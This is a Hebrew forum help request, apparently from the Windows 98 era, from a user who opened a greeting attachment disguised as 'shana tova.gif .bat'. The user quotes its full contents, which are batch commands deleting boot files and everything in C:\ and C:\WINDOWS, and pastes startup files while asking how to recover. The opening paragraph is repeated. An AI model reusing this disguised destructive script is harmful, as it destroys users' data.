וירוס "שנה טובה"
קיבלתי "שנה טובה" בצורת קובץ מצורף בשם shanatova.gif המכיל וירוס שמוחק את קבצי האתחול AUTOEXEC.BAT ו-CONFIG.SYS. תוכן הקובץ: Content-Type: application/octet-stream; name="shana tova.gif .bat" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="shana tova.gif .bat" echo on cd c: del c:\autoexec.bat del c:\config.sys del c:\*.* del c:\windows\*.* אני "אכלתי אותה" ופתחתי את הקובץ... ואכן, הקבצים AUTOEXEC.BAT ו-CONFIG.SYS נמחקו מה-ROOT DIRECTORY של הדיסק. מצאתי קבצים בשם הנ"ל ב-C:\WINDOWS\COMMAND\EBD והעתקתי אותם ל-C:\. האם זה יעזור? אני מפחד שאני לא אוכל לאתחל את המחשב... מישהו מכיר את הוירוס הזה? מה אפשר לעשות?
קיבלתי "שנה טובה" בצורת קובץ מצורף בשם shanatova.gif המכיל וירוס שמוחק את קבצי האתחול AUTOEXEC.BAT ו-CONFIG.SYS. תוכן הקובץ: Content-Type: application/octet-stream; name="shana tova.gif .bat" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="shana tova.gif .bat" echo on cd c: del c:\autoexec.bat del c:\config.sys del c:\*.* del c:\windows\*.* אני "אכלתי אותה" ופתחתי את הקובץ... ואכן, הקבצים AUTOEXEC.BAT ו-CONFIG.SYS נמחקו מה-ROOT DIRECTORY של הדיסק. מצאתי קבצים בשם הנ"ל ב-C:\WINDOWS\COMMAND\EBD והעתקתי אותם ל-C:\. האם זה יעזור? אני מפחד שאני לא אוכל לאתחל את המחשב... מישהו מכיר את הוירוס הזה? מה אפשר לעשות?
ath=%RAMD%:\;a:\;%CDROM%:copy command.com %RAMD%:\ > NUL set comspec=%RAMD%:\command.com copy extract.exe %RAMD%:\ > NUL copy readme.txt %RAMD%:\ > NUL :ERROR IF EXIST ebd.cab GOTO EXT echo Please insert Windows 98 Startup Disk 2 echo. pause GOTO ERROR :EXT %RAMD%:\extract /y /e /l %RAMD%: ebd.cab > NUL echo The diagnostic tools were successfully loaded to drive %RAMD%. echo. IF "%config%"=="NOCD" GOTO QUIT IF "%config%"=="HELP" GOTO HELP LH %ramd%:\MSCDEX.EXE /D:mscd001 /L:%CDROM% echo. GOTO QUIT :HELP cls call help.bat echo Your computer will now restart and the startup menu will appear. echo. echo. echo. echo. echo. echo. echo. echo. echo. echo. restart.com GOTO QUIT :QUIT echo To get help, type HELP and press ENTER. echo. rem clean up environment variables set CDROM= set LglDrv= יש לי ב-C:\ קובץ בשם AUTOEXEC.001 שיכול להיות עותק של AUTOEXEC.BAT המקורי... הוא נוצר בתאריך של התקנת WINDOWS, והקובץ למעלה הוא משנת 98... התוכן של ה-001 הוא: @ECHO OFF if not exist %winbootdir%\system\vmm32.o20 copy %winbootdir%\system\vmm32.vxd %winbootdir%\system\vmm32.o20 cd %winbootdir%\system devlib -u vmm32.vxd rplcldr %winbootdir%\system\vmm32\vmm.vxd %winbootdir%\system\vmm32.vxd devlib -p vmm32.vxd mode con codepage prepare=((862) C:\WINDOWS\COMMAND\hebega.cpi) mode con codepage select=862 האם אכן זה הקובץ הנכון? האם להעתיק אותו במקום הקובץ הקיים (זה שלמעלה)? האם אפשר לעשות את זה ב-WINDOWS?